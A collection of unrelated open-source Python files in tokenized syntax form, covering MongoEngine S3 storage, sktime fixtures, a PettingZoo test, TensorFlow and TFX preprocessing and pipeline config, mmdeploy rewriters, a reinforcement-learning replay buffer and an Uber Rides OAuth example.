changed"""<if_stmt>self.instance<block_start>self.instance._mark_as_changed(self.key)<block_end><block_end><block_end><class_stmt>S3FileField(FileField)<block_start>""" Custom FileField for MongoEngine which utilizes S3. """<def_stmt>__init__ self db_alias=DEFAULT_CONNECTION_NAME collection_name="fs" **kwargs<block_start>super(S3FileField self).__init__(db_alias collection_name **kwargs)<line_sep>self.proxy_class=S3Proxy<block_end><def_stmt>__set__ self instance value<block_start>key=self.name<if_stmt>((hasattr(value 'read')<and><not>isinstance(value self.proxy_class))<or>isinstance(value str_types))# using "FileField() = file/string" notation <block_start>grid_file=instance._data.get(self.name)<line_sep># If a file already exists, delete it <if_stmt>grid_file<block_start><try_stmt><block_start>grid_file.delete()<block_end><except_stmt><block_start><pass><block_end># Create a new file with the new data grid_file.put(value)<block_end><else_stmt># Create a new proxy object as we don't already have one <block_start>instance._data[key]=self.proxy_class(key=key instance=instance collection_name=self.collection_name)<line_sep>instance._data[key].put(value)<block_end><block_end><else_stmt><block_start>instance._data[key]=value<block_end>instance._mark_as_changed(key)<block_end><block_end><def_stmt>getFileField db_alias=DEFAULT_CONNECTION_NAME collection_name="fs" **kwargs<block_start>""" Determine if the admin has configured CRITs to utilize GridFS or S3 for binary storage. """<if_stmt>settings.FILE_DB<eq>settings.GRIDFS<block_start><return>FileField(db_alias collection_name **kwargs)<block_end><elif_stmt>settings.FILE_DB<eq>settings.S3<block_start><return>S3FileField(db_alias collection_name **kwargs)<block_end><block_end>
# -*- coding: utf-8 -*- """Example generation for testing. Exports dict of examples, useful for testing as fixtures. example_dict: dict indexed by triple 1st element = mtype - str 2nd element = considered as this scitype - str 3rd element = int - index of example elements are data objects, considered examples for the mtype all examples with same index are considered "same" on scitype content if None, indicates that representation is not possible example_lossy: dict of bool indexed by pairs of str 1st element = mtype - str 2nd element = considered as this scitype - str 3rd element = int - index of example elements are bool, indicate whether representation has information removed all examples with same index are considered "same" on scitype content overall, conversions from non-lossy representations to any other ones should yield the element exactly, identidally (given same index) """<import_stmt>pandas<as>pd<import_stmt>numpy<as>np<line_sep>example_dict=dict()<line_sep>example_dict_lossy=dict()<line_sep>### X=np.array([[[1 2 3] [4 5 6]] [[1 2 3] [4 55 6]] [[1 2 3] [42 5 6]]] dtype=np.int64 )<line_sep>example_dict[("numpy3D" "Panel" 0)]=X<line_sep>example_dict_lossy[("numpy3D" "Panel" 0)]=<false><line_sep>cols=[f"var_{i}"<for>i range(2)]<line_sep>Xlist=[pd.DataFrame([[1 4] [2 5] [3 6]] columns=cols) pd.DataFrame([[1 4] [2 55] [3 6]] columns=cols) pd.DataFrame([[1 42] [2 5] [3 6]] columns=cols) ]<line_sep>example_dict[("df-list" "Panel" 0)]=Xlist<line_sep>example_dict_lossy[("df-list" "Panel" 0)]=<false><line_sep>cols=["instances" "timepoints"]+[f"var_{i}"<for>i range(2)]<line_sep>Xlist=[pd.DataFrame([[0 0 1 4] [0 1 2 5] [0 2 3 6]] columns=cols) pd.DataFrame([[1 0 1 4] [1 1 2 55] [1 2 3 6]] columns=cols) pd.DataFrame([[2 0 1 42] [2 1 2 5] [2 2 3 6]] columns=cols) ]<line_sep>X=pd.concat(Xlist)<line_sep>X=X.set_index(["instances" "timepoints"])<line_sep>example_dict[("pd-multiindex" "Panel" 0)]=X<line_sep>example_dict_lossy[("pd-multiindex" "Panel" 0)]=<false><line_sep>cols=[f"var_{i}"<for>i range(2)]<line_sep>X=pd.DataFrame(columns=cols index=[0 1 2])<line_sep>X["var_0"]=pd.Series([pd.Series([1 2 3]) pd.Series([1 2 3]) pd.Series([1 2 3])])<line_sep>X["var_1"]=pd.Series([pd.Series([4 5 6]) pd.Series([4 55 6]) pd.Series([42 5 6])])<line_sep>example_dict[("nested_univ" "Panel" 0)]=X<line_sep>example_dict_lossy[("nested_univ" "Panel" 0)]=<false><line_sep>
<import_stmt>numpy<as>np<def_stmt>max_cycles_test mod<block_start>max_cycles=4<line_sep>parallel_env=mod.parallel_env(max_cycles=max_cycles)<line_sep>observations=parallel_env.reset()<line_sep>dones={agent:<false><for>agent parallel_env.agents}<line_sep>test_cycles=max_cycles+10# allows environment to do more than max_cycles if it so wishes <for_stmt>step range(test_cycles)<block_start>actions={agent:parallel_env.action_space(agent).sample()<for>agent parallel_env.agents<if><not>dones[agent]}<line_sep>observations,rewards,dones,infos=parallel_env.step(actions)<if_stmt>all(dones.values())<block_start><break><block_end><block_end>pstep=step+1<line_sep>env=mod.env(max_cycles=max_cycles)<line_sep>env.reset()<line_sep>agent_counts=np.zeros(len(env.possible_agents))<for_stmt>a env.agent_iter()# counts agent index <block_start>aidx=env.possible_agents.index(a)<line_sep>agent_counts[aidx]<augadd>1<line_sep>action=env.action_space(a).sample()<if><not>env.dones[a]<else><none><line_sep>env.step(action)<block_end><assert_stmt>max_cycles<eq>pstep<line_sep># does not check the minimum value because some agents might be killed before # all the steps are complete. However, most agents should still be alive # given a short number of cycles <assert_stmt>max_cycles<eq>np.max(agent_counts)-1<assert_stmt>max_cycles<eq>np.median(agent_counts)-1<block_end>
# Copyright 2017 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_future_stmt> unicode_literals<import_stmt>argparse<import_stmt>collections<import_stmt>json<import_stmt>os<import_stmt>six<import_stmt>sys<import_from_stmt>tensorflow.python.lib.io file_io<line_sep>SCHEMA_FILE='schema.json'<line_sep>NUMERICAL_ANALYSIS_FILE='stats.json'<line_sep>CATEGORICAL_ANALYSIS_FILE='vocab_%s.csv'<def_stmt>parse_arguments argv<block_start>"""Parse command line arguments. Args: argv: list of command line arguments, includeing programe name. Returns: An argparse Namespace object. """<line_sep>parser=argparse.ArgumentParser(description='Runs Preprocessing on structured CSV data.')<line_sep>parser.add_argument('--input-file-pattern' type=str required=<true> help='Input CSV file names. May contain a file pattern')<line_sep>parser.add_argument('--output-dir' type=str required=<true> help='Google Cloud Storage which to place outputs.')<line_sep>parser.add_argument('--schema-file' type=str required=<true> help=('BigQuery json schema file'))<line_sep>args=parser.parse_args(args=argv[1:])<line_sep># Make sure the output folder exists if local folder. file_io.recursive_create_dir(args.output_dir)<line_sep><return>args<block_end><def_stmt>run_numerical_categorical_analysis args schema_list<block_start>"""Makes the numerical and categorical analysis files. Args: args: the command line args schema_list: python object of the schema json file. Raises: ValueError: if schema contains unknown column types. """<line_sep>header=[column['name']<for>column schema_list]<line_sep>input_files=file_io.get_matching_files(args.input_file_pattern)<line_sep># Check the schema is valid <for_stmt>col_schema schema_list<block_start>col_type=col_schema['type'].lower()<if_stmt>col_type<ne>'string'<and>col_type<ne>'integer'<and>col_type<ne>'float'<block_start><raise>ValueError('Schema contains an unsupported type %s.'%col_type)<block_end><block_end># initialize the results <def_stmt>_init_numerical_results <block_start><return>{'min':float('inf') 'max':float('-inf') 'count':0 'sum':0.0}<block_end>numerical_results=collections.defaultdict(_init_numerical_results)<line_sep>categorical_results=collections.defaultdict(set)<line_sep># for each file, update the numerical stats from that file, and update the set # of unique labels. <for_stmt>input_file input_files<block_start><with_stmt>file_io.FileIO(input_file 'r')<as>f<block_start><for_stmt>line f<block_start>parsed_line=dict(zip(header line.strip().split(',')))<for_stmt>col_schema schema_list<block_start>col_name=col_schema['name']<line_sep>col_type=col_schema['type']<if_stmt>col_type.lower()<eq>'string'<block_start>categorical_results[col_name].update([parsed_line[col_name]])<block_end><else_stmt># numerical column. # if empty, skip <block_start><if_stmt><not>parsed_line[col_name].strip()<block_start><continue><block_end>numerical_results[col_name]['min']=(min(numerical_results[col_name]['min'] float(parsed_line[col_name])))<line_sep>numerical_results[col_name]['max']=(max(numerical_results[col_name]['max'] float(parsed_line[col_name])))<line_sep>numerical_results[col_name]['count']<augadd>1<line_sep>numerical_results[col_name]['sum']<augadd>float(parsed_line[col_name])<block_end><block_end><block_end><block_end><block_end># Update numerical_results to just have min/min/mean <for_stmt>col_schema schema_list<block_start><if_stmt>col_schema['type'].lower()<ne>'string'<block_start>col_name=col_schema['name']<line_sep>mean=numerical_results[col_name]['sum']/numerical_results[col_name]['count']<del_stmt>numerical_results[col_name]['sum']<del_stmt>numerical_results[col_name]['count']<line_sep>numerical_results[col_name]['mean']=mean<block_end><block_end># Write the numerical_results to a json file. file_io.write_string_to_file(os.path.join(args.output_dir NUMERICAL_ANALYSIS_FILE) json.dumps(numerical_results indent=2 separators=(',' ': ')))<line_sep># Write the vocab files. Each label is on its own line. <for_stmt>name,unique_labels six.iteritems(categorical_results)<block_start>labels='\n'.join(list(unique_labels))<line_sep>file_io.write_string_to_file(os.path.join(args.output_dir CATEGORICAL_ANALYSIS_FILE%name) labels)<block_end><block_end><def_stmt>run_analysis args<block_start>"""Builds an analysis files for training."""<line_sep># Read the schema and input feature types schema_list=json.loads(file_io.read_file_to_string(args.schema_file))<line_sep>run_numerical_categorical_analysis(args schema_list)<line_sep># Also save a copy of the schema in the output folder. file_io.copy(args.schema_file os.path.join(args.output_dir SCHEMA_FILE) overwrite=<true>)<block_end><def_stmt>main argv=<none><block_start>args=parse_arguments(sys.argv<if>argv<is><none><else>argv)<line_sep>run_analysis(args)<block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
"""MNE visual_92_categories dataset."""<import_from_stmt>.kiloword data_path get_version<line_sep>
# Copyright (c) OpenMMLab. All rights reserved. <import_stmt>torch<import_from_stmt>mmdeploy.core FUNCTION_REWRITER<line_sep>@FUNCTION_REWRITER.register_rewriter('mmdet.models.roi_heads.test_mixins.BBoxTestMixin.simple_test_bboxes')<def_stmt>bbox_test_mixin__simple_test_bboxes ctx self x img_metas proposals rcnn_test_cfg rescale=<false><block_start>"""Rewrite `simple_test_bboxes` of `BBoxTestMixin` for default backend. 1. This function eliminates the batch dimension to get forward bbox results, and recover batch dimension to calculate final result for deployment. 2. This function returns detection result as Tensor instead of numpy array. Args: ctx (ContextCaller): The context with additional information. self: The instance of the original class. x (tuple[Tensor]): Features from upstream network. Each has shape (batch_size, c, h, w). img_metas (list[dict]): Meta information of images. proposals (list(Tensor)): Proposals from rpn head. Each has shape (num_proposals, 5), last dimension 5 represent (x1, y1, x2, y2, score). rcnn_test_cfg (obj:`ConfigDict`): `test_cfg` of R-CNN. rescale (bool): If True, return boxes in original image space. Default: False. Returns: tuple[Tensor, Tensor]: (det_bboxes, det_labels), `det_bboxes` of shape [N, num_det, 5] and `det_labels` of shape [N, num_det]. """<line_sep>rois=proposals<line_sep>batch_index=torch.arange(rois.shape[0] device=rois.device).float().view(-1 1 1).expand(rois.size(0) rois.size(1) 1)<line_sep>rois=torch.cat([batch_index rois[<ellipsis> :4]] dim=-1)<line_sep>batch_size=rois.shape[0]<line_sep>num_proposals_per_img=rois.shape[1]<line_sep># Eliminate the batch dimension rois=rois.view(-1 5)<line_sep>bbox_results=self._bbox_forward(x rois)<line_sep>cls_score=bbox_results['cls_score']<line_sep>bbox_pred=bbox_results['bbox_pred']<line_sep># Recover the batch dimension rois=rois.reshape(batch_size num_proposals_per_img rois.size(-1))<line_sep>cls_score=cls_score.reshape(batch_size num_proposals_per_img cls_score.size(-1))<line_sep>bbox_pred=bbox_pred.reshape(batch_size num_proposals_per_img bbox_pred.size(-1))<line_sep>det_bboxes,det_labels=self.bbox_head.get_bboxes(rois cls_score bbox_pred img_metas[0]['img_shape'] <none> rescale=rescale cfg=rcnn_test_cfg)<line_sep><return>det_bboxes det_labels<block_end>@FUNCTION_REWRITER.register_rewriter('mmdet.models.roi_heads.test_mixins.MaskTestMixin.simple_test_mask')<def_stmt>mask_test_mixin__simple_test_mask ctx self x img_metas det_bboxes det_labels **kwargs<block_start>"""Rewrite `simple_test_mask` of `BBoxTestMixin` for default backend. This function returns detection result as Tensor instead of numpy array. Args: ctx (ContextCaller): The context with additional information. self: The instance of the original class. x (tuple[Tensor]): Features from upstream network. Each has shape (batch_size, c, h, w). img_metas (list[dict]): Meta information of images. det_bboxes (tuple[Tensor]): Detection bounding-boxes from features. Each has shape of (batch_size, num_det, 5). det_labels (tuple[Tensor]): Detection labels from features. Each has shape of (batch_size, num_det). Returns: tuple[Tensor]: (segm_results), `segm_results` of shape [N, num_det, roi_H, roi_W]. """<line_sep>batch_size=det_bboxes.size(0)<line_sep>det_bboxes=det_bboxes[<ellipsis> :4]<line_sep>batch_index=torch.arange(det_bboxes.size(0) device=det_bboxes.device).float().view(-1 1 1).expand(det_bboxes.size(0) det_bboxes.size(1) 1)<line_sep>mask_rois=torch.cat([batch_index det_bboxes] dim=-1)<line_sep>mask_rois=mask_rois.view(-1 5)<line_sep>mask_results=self._mask_forward(x mask_rois)<line_sep>mask_pred=mask_results['mask_pred']<line_sep>max_shape=img_metas[0]['img_shape']<line_sep>num_det=det_bboxes.shape[1]<line_sep>det_bboxes=det_bboxes.reshape(-1 4)<line_sep>det_labels=det_labels.reshape(-1)<line_sep>segm_results=self.mask_head.get_seg_masks(mask_pred det_bboxes det_labels self.test_cfg max_shape)<line_sep>segm_results=segm_results.reshape(batch_size num_det segm_results.shape[-2] segm_results.shape[-1])<line_sep><return>segm_results<block_end>
<import_from_stmt>collections deque<import_from_stmt>copy deepcopy<import_from_stmt>slm_lab.agent.memory.base Memory<import_from_stmt>slm_lab.lib logger math_util util<import_from_stmt>slm_lab.lib.decorator lab_api<import_stmt>numpy<as>np<import_stmt>pydash<as>ps<line_sep>logger=logger.get_logger(__name__)<def_stmt>sample_next_states head max_size ns_idx_offset batch_idxs states ns_buffer<block_start>'''Method to sample next_states from states, with proper guard for next_state idx being out of bound'''<line_sep># idxs for next state is state idxs with offset, modded ns_batch_idxs=(batch_idxs+ns_idx_offset)%max_size<line_sep># if head < ns_idx <= head + ns_idx_offset, ns is stored in ns_buffer ns_batch_idxs=ns_batch_idxs%max_size<line_sep>buffer_ns_locs=np.argwhere((head<l>ns_batch_idxs)&(ns_batch_idxs<le>head+ns_idx_offset)).flatten()<line_sep># find if there is any idxs to get from buffer to_replace=buffer_ns_locs.size<ne>0<if_stmt>to_replace# extract the buffer_idxs first for replacement later # given head < ns_idx <= head + offset, and valid buffer idx is [0, offset) # get 0 < ns_idx - head <= offset, or equiv. # get -1 < ns_idx - head - 1 <= offset - 1, i.e. # get 0 <= ns_idx - head - 1 < offset, hence: <block_start>buffer_idxs=ns_batch_idxs[buffer_ns_locs]-head-1<line_sep># set them to 0 first to allow sampling, then replace later with buffer ns_batch_idxs[buffer_ns_locs]=0<block_end># guard all against overrun idxs from offset ns_batch_idxs=ns_batch_idxs%max_size<line_sep>next_states=util.batch_get(states ns_batch_idxs)<if_stmt>to_replace# now replace using buffer_idxs and ns_buffer <block_start>buffer_ns=util.batch_get(ns_buffer buffer_idxs)<line_sep>next_states[buffer_ns_locs]=buffer_ns<block_end><return>next_states<block_end><class_stmt>Replay(Memory)<block_start>''' Stores agent experiences and samples from them for agent training An experience consists of - state: representation of a state - action: action taken - reward: scalar value - next state: representation of next state (should be same as state) - done: 0 / 1 representing if the current state is the last in an episode The memory has a size of N. When capacity is reached, the oldest experience is deleted to make space for the lastest experience. - This is implemented as a circular buffer so that inserting experiences are O(1) - Each element of an experience is stored as a separate array of size N * element dim When a batch of experiences is requested, K experiences are sampled according to a random uniform distribution. If 'use_cer', sampling will add the latest experience. e.g. memory_spec "memory": { "name": "Replay", "batch_size": 32, "max_size": 10000, "use_cer": true } '''<def_stmt>__init__ self memory_spec body<block_start>super().__init__(memory_spec body)<line_sep>util.set_attr(self self.memory_spec ['batch_size' 'max_size' 'use_cer' ])<line_sep>self.is_episodic=<false><line_sep>self.batch_idxs=<none><line_sep>self.size=0# total experiences stored self.seen_size=0# total experiences seen cumulatively self.head=-1# index of most recent experience # generic next_state buffer to store last next_states (allow for multiple for venv) self.ns_idx_offset=self.body.env.num_envs<if>body.env.is_venv<else>1<line_sep>self.ns_buffer=deque(maxlen=self.ns_idx_offset)<line_sep># declare what data keys to store self.data_keys=['states' 'actions' 'rewards' 'next_states' 'dones']<line_sep>self.reset()<block_end><def_stmt>reset self<block_start>'''Initializes the memory arrays, size and head pointer'''<line_sep># set self.states, self.actions, ... <for_stmt>k self.data_keys<block_start><if_stmt>k<ne>'next_states'# reuse self.states # list add/sample is over 10x faster than np, also simpler to handle <block_start>setattr(self k [<none>]<times>self.max_size)<block_end><block_end>self.size=0<line_sep>self.head=-1<line_sep>self.ns_buffer.clear()<block_end>@lab_api<def_stmt>update self state action reward next_state done<block_start>'''Interface method to update memory'''<if_stmt>self.body.env.is_venv<block_start><for_stmt>sarsd zip(state action reward next_state done)<block_start>self.add_experience(*sarsd)<block_end><block_end><else_stmt><block_start>self.add_experience(state action reward next_state done)<block_end><block_end><def_stmt>add_experience self state action reward next_state done<block_start>'''Implementation for update() to add experience to memory, expanding the memory size if necessary'''<line_sep># Move head pointer. Wrap around if necessary self.head=(self.head+1)%self.max_size<line_sep>self.states[self.head]=state.astype(np.float16)<line_sep>self.actions[self.head]=action<line_sep>self.rewards[self.head]=reward<line_sep>self.ns_buffer.append(next_state.astype(np.float16))<line_sep>self.dones[self.head]=done<line_sep># Actually occupied size of memory <if_stmt>self.size<l>self.max_size<block_start>self.size<augadd>1<block_end>self.seen_size<augadd>1<line_sep># set to_train using memory counters head, seen_size instead of tick since clock will step by num_envs when on venv; to_train will be set to 0 after training step algorithm=self.body.agent.algorithm<line_sep>algorithm.to_train=algorithm.to_train<or>(self.seen_size<g>algorithm.training_start_step<and>self.head%algorithm.training_frequency<eq>0)<block_end>@lab_api<def_stmt>sample self<block_start>''' Returns a batch of batch_size samples. Batch is stored as a dict. Keys are the names of the different elements of an experience. Values are an array of the corresponding sampled elements e.g. batch = { 'states' : states, 'actions' : actions, 'rewards' : rewards, 'next_states': next_states, 'dones' : dones} '''<line_sep>self.batch_idxs=self.sample_idxs(self.batch_size)<line_sep>batch={}<for_stmt>k self.data_keys<block_start><if_stmt>k<eq>'next_states'<block_start>batch[k]=sample_next_states(self.head self.max_size self.ns_idx_offset self.batch_idxs self.states self.ns_buffer)<block_end><else_stmt><block_start>batch[k]=util.batch_get(getattr(self k) self.batch_idxs)<block_end><block_end><return>batch<block_end><def_stmt>sample_idxs self batch_size<block_start>'''Batch indices a sampled random uniformly'''<line_sep>batch_idxs=np.random.randint(self.size size=batch_size)<if_stmt>self.use_cer# add the latest sample <block_start>batch_idxs[-1]=self.head<block_end><return>batch_idxs<block_end><block_end>
# Copyright 2020 Google LLC. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # NOTE: this is adapted from the official TFX taxi pipeline sample # You can find it here: https://github.com/tensorflow/tfx/tree/master/tfx/examples/chicago_taxi_pipeline <import_stmt>os# pylint: disable=unused-import # Pipeline name will be used to identify this pipeline PIPELINE_NAME='my_pipeline'<line_sep># TODO: replace with your Google Cloud project GOOGLE_CLOUD_PROJECT='your-cloud-project'<line_sep># TODO: replace with the GCS bucket where you'd like to store model artifacts # Only include the bucket name here, without the 'gs://' GCS_BUCKET_NAME='your-gcs-bucket'<line_sep># TODO: set your Google Cloud region below (or use us-central1) GOOGLE_CLOUD_REGION='us-central1'<line_sep>RUN_FN='pipeline.model.run_fn'<line_sep>TRAIN_NUM_STEPS=100<line_sep>EVAL_NUM_STEPS=100<line_sep>BIG_QUERY_WITH_DIRECT_RUNNER_BEAM_PIPELINE_ARGS=['--project='+GOOGLE_CLOUD_PROJECT '--temp_location='+os.path.join('gs://' GCS_BUCKET_NAME 'tmp') ]<line_sep># The rate at which to sample rows from the Chicago Taxi dataset using BigQuery. # The full taxi dataset is > 120M record. In the interest of resource # savings and time, we've set the default for this example to be much smaller. # Feel free to crank it up and process the full dataset! _query_sample_rate=0.0001# Generate a 0.01% random sample. # The query that extracts the examples from BigQuery. This sample uses # a BigQuery public dataset from NOAA BIG_QUERY_QUERY=""" SELECT usa_wind, usa_sshs FROM `bigquery-public-data.noaa_hurricanes.hurricanes` WHERE latitude > 19.5 AND latitude < 64.85 AND longitude > -161.755 AND longitude < -68.01 AND usa_wind IS NOT NULL AND longitude IS NOT NULL AND latitude IS NOT NULL AND usa_sshs IS NOT NULL AND usa_sshs > 0 """<line_sep># A dict which contains the training job parameters to be passed to Google # Cloud AI Platform. For the full set of parameters supported by Google Cloud AI # Platform, refer to # https://cloud.google.com/ml-engine/reference/rest/v1/projects.jobs#Job GCP_AI_PLATFORM_TRAINING_ARGS={'project':GOOGLE_CLOUD_PROJECT 'region':'us-central1' # Starting from TFX 0.14, training on AI Platform uses custom containers: # https://cloud.google.com/ml-engine/docs/containers-overview # You can specify a custom container here. If not specified, TFX will use # a public container image matching the installed version of TFX. # Set your container name below. 'masterConfig':{'imageUri':'gcr.io/'+GOOGLE_CLOUD_PROJECT+'/tfx-pipeline'} # Note that if you do specify a custom container, ensure the entrypoint # calls into TFX's run_executor script (tfx/scripts/run_executor.py) }<line_sep># A dict which contains the serving job parameters to be passed to Google # Cloud AI Platform. For the full set of parameters supported by Google Cloud AI # Platform, refer to # https://cloud.google.com/ml-engine/reference/rest/v1/projects.models GCP_AI_PLATFORM_SERVING_ARGS={'model_name':PIPELINE_NAME 'project_id':GOOGLE_CLOUD_PROJECT # The region to use when serving the model. See available regions here: # https://cloud.google.com/ml-engine/docs/regions 'regions':[GOOGLE_CLOUD_REGION] }<line_sep>
# Copyright (c) 2017 Uber Technologies, Inc. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. """Initializes an UberRidesClient with OAuth 2.0 Credentials. This example demonstrates how to get an access token through the OAuth 2.0 Authorization Code Grant and use credentials to create an UberRidesClient. To run this example: (1) Set your app credentials in config.driver.yaml (2) Run `python authorize_driver.py` (3) A success message will print, 'Hello {YOUR_NAME}' (4) User OAuth 2.0 credentials are recorded in 'oauth_driver_session_store.yaml' """<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_future_stmt> unicode_literals<import_from_stmt>builtins input<import_from_stmt>yaml safe_dump<import_from_stmt>example utils# NOQA <import_from_stmt>example.utils fail_print<import_from_stmt>example.utils response_print<import_from_stmt>example.utils success_print<import_from_stmt>example.utils import_app_credentials<import_from_stmt>uber_rides.auth AuthorizationCodeGrant<import_from_stmt>uber_rides.client UberRidesClient<import_from_stmt>uber_rides.errors ClientError<import_from_stmt>uber_rides.errors ServerError<import_from_stmt>uber_rides.errors UberIllegalState<def_stmt>authorization_code_grant_flow credentials storage_filename<block_start>"""Get an access token through Authorization Code Grant. Parameters credentials (dict) All your app credentials and information imported from the configuration file. storage_filename (str) Filename to store OAuth 2.0 Credentials. Returns (UberRidesClient) An UberRidesClient with OAuth 2.0 Credentials. """<line_sep>auth_flow=AuthorizationCodeGrant(credentials.get('client_id') credentials.get('scopes') credentials.get('client_secret') credentials.get('redirect_url') )<line_sep>auth_url=auth_flow.get_authorization_url()<line_sep>login_message='Login as a driver and grant access by going to:\n\n{}\n'<line_sep>login_message=login_message.format(auth_url)<line_sep>response_print(login_message)<line_sep>redirect_url='Copy the URL you are redirected to and paste here:\n\n'<line_sep>result=input(redirect_url).strip()<try_stmt><block_start>session=auth_flow.get_session(result)<block_end><except_stmt>(ClientError UberIllegalState)<as>error<block_start>fail_print(error)<line_sep><return><block_end>credential=session.oauth2credential<line_sep>credential_data={'client_id':credential.client_id 'redirect_url':credential.redirect_url 'access_token':credential.access_token 'expires_in_seconds':credential.expires_in_seconds 'scopes':list(credential.scopes) 'grant_type':credential.grant_type 'client_secret':credential.client_secret 'refresh_token':credential.refresh_token }<with_stmt>open(storage_filename 'w')<as>yaml_file<block_start>yaml_file.write(safe_dump(credential_data default_flow_style=<false>))<block_end><return>UberRidesClient(session sandbox_mode=<true>)<block_end><def_stmt>hello_user api_client<block_start>"""Use an authorized client to fetch and print profile information. Parameters api_client (UberRidesClient) An UberRidesClient with OAuth 2.0 credentials. """<try_stmt><block_start>response=api_client.get_driver_profile()<block_end><except_stmt>(ClientError ServerError)<as>error<block_start>fail_print(error)<line_sep><return><block_end><else_stmt><block_start>profile=response.json<line_sep>first_name=profile.get('first_name')<line_sep>last_name=profile.get('last_name')<line_sep>email=profile.get('email')<line_sep>message='Hello, {} {}. Successfully granted access token to {}.'<line_sep>message=message.format(first_name last_name email)<line_sep>success_print(message)<line_sep>success_print(profile)<line_sep>success_print('---')<line_sep>response=api_client.get_driver_trips()<line_sep>trips=response.json<line_sep>success_print(trips)<line_sep>success_print('---')<line_sep>response=api_client.get_driver_payments()<line_sep>payments=response.json<line_sep>success_print(payments)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>"""Run the example. Get an access token through the OAuth 2.0 Authorization Code Grant and use credentials to create an UberRidesClient. """<line_sep>credentials=import_app_credentials('config.driver.yaml')<line_sep>api_client=authorization_code_grant_flow(credentials 'oauth_driver_session_store.yaml' )<line_sep>hello_user(api_client)<block_end>